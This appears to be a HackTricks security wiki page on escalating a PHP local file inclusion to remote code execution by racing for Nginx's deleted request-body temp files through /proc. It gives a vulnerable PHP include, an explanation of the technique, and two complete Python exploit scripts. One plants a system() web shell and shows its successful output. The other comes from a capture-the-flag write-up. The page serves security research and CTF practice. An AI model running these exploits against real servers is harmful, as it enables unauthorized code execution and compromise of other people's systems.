
LFI2RCE via Nginx temp files

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Vulnerable configuration

  • PHP कोड:
<?php include_once($_GET['file']);
  • FPM / PHP कॉन्फ़िग:
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
  • सेटअप / हार्डनिंग:
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...

Luckily (or unluckily), PHP is nowadays often deployed with PHP-FPM & Nginx. Nginx offers an easily-overlooked client body buffering feature which writes temporary files if the client body (not limited to POST) is bigger than a certain threshold.

If Nginx runs as the same user as PHP (very commonly www-data), this feature allows LFIs to be exploited even without any other way of creating files.
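As a sketch of the trigger condition: nginx buffers request bodies in memory up to `client_body_buffer_size` (16 KB by default on 64-bit platforms) and spills anything larger to a temp file under its body temp path. The helper below pads a PHP payload past that threshold; the exact buffer size on a given target is an assumption, and the commented-out request targets a hypothetical URL:

```python
# Sketch: build a request body just large enough to force nginx to spill it
# to a temp file. 16 KB is nginx's default client_body_buffer_size on 64-bit
# systems; the value on a real target is an assumption.
NGINX_BODY_BUFFER = 16 * 1024

def make_spill_body(payload: bytes, pad: bytes = b"A") -> bytes:
    """Pad a PHP payload so the total body exceeds the buffer size."""
    return payload + pad * (NGINX_BODY_BUFFER + 1 - len(payload))

body = make_spill_body(b'<?php system($_GET["c"]); /*')
# Sending it (hypothetical target URL):
# requests.get("http://target/", data=body)
```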

Relevant Nginx code:

ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
    ngx_fd_t  fd;

    fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
              access ? access : 0600);

    if (fd != -1 && !persistent) {
        (void) unlink((const char *) name);
    }

    return fd;
}

This shows that the tempfile is unlinked immediately after being opened by Nginx. Luckily, procfs can still be used to obtain a reference to the deleted file via a race:

...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
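The behaviour the race relies on can be demonstrated locally (Linux only, since it depends on procfs): an unlinked file stays readable through a still-open file descriptor exposed under /proc/\<pid\>/fd. A minimal sketch mirroring what `ngx_open_tempfile()` does, not part of the exploit itself:

```python
import os
import tempfile

def read_deleted_via_procfs() -> bytes:
    # Create a temp file, keep the fd open, then unlink it - mirroring
    # ngx_open_tempfile(): open(O_CREAT|O_EXCL|O_RDWR) followed by unlink().
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"still here after unlink\n")
        os.unlink(path)  # the name is gone from the filesystem...
        # ...but the open fd keeps the inode alive, and procfs's magic
        # symlink /proc/self/fd/<fd> still opens the deleted file:
        with open(f"/proc/self/fd/{fd}", "rb") as f:
            return f.read()
    finally:
        os.close(fd)

print(read_deleted_via_procfs())  # b'still here after unlink\n'
```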

Note: one cannot directly include /proc/34/fd/15 in this example, as PHP's include function would resolve the path to /var/lib/nginx/body/0000001368 (deleted), which doesn't exist on the filesystem. Luckily, this minor restriction can be bypassed by some indirection such as /proc/self/fd/34/../../../34/fd/15, which will finally execute the content of the deleted /var/lib/nginx/body/0000001368 file.
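The indirection boils down to building a path whose extra `../../../` components sidestep PHP include's readlink/stat resolution of the fd symlink to its dangling `… (deleted)` target. A sketch of the path construction (the pid/fd values are placeholders):

```python
def procfs_fd_path(nginx_pid: int, fd: int) -> str:
    # The detour through /proc/self/fd/<pid>/../../../ walks back up into
    # /proc, so the final fd/<fd> component is resolved as a procfs magic
    # symlink instead of being expanded to the "(deleted)" target path.
    return f"/proc/self/fd/{nginx_pid}/../../../{nginx_pid}/fd/{fd}"

print(procfs_fd_path(34, 15))
# /proc/self/fd/34/../../../34/fd/15
```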

Full exploit

#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r  = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r  = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r  = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')

for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()

# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
    global done

    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
            r  = requests.get(URL, params={
                'file': f,
                'c': f'id'
            })
            if r.text:
                print(f'[!] {f}: {r.text}')
                done = True
                exit()

for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, ))
    a.start()


$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Another exploit

This is from https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/.

import requests
import threading
import multiprocessing
import random

SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False

def create_requests_session():
    session = requests.Session()
    # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
    session.mount('http://', adapter)
    return session

def get_nginx_pids(requests_session):
    if USE_NGINX_PIDS_CACHE:
        return NGINX_PIDS_CACHE
    nginx_pids = set()
    # Scan up to PID 200
    for i in range(1, 200):
        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
        if cmdline.startswith("nginx: worker process"):
            nginx_pids.add(i)
    return nginx_pids

def send_payload(requests_session, body_size=1024000):
    try:
        # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
        payload = '<?php system("/readflag"); ?> //'
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # This method creates a path from a random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{<flag>}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)

Labs

References
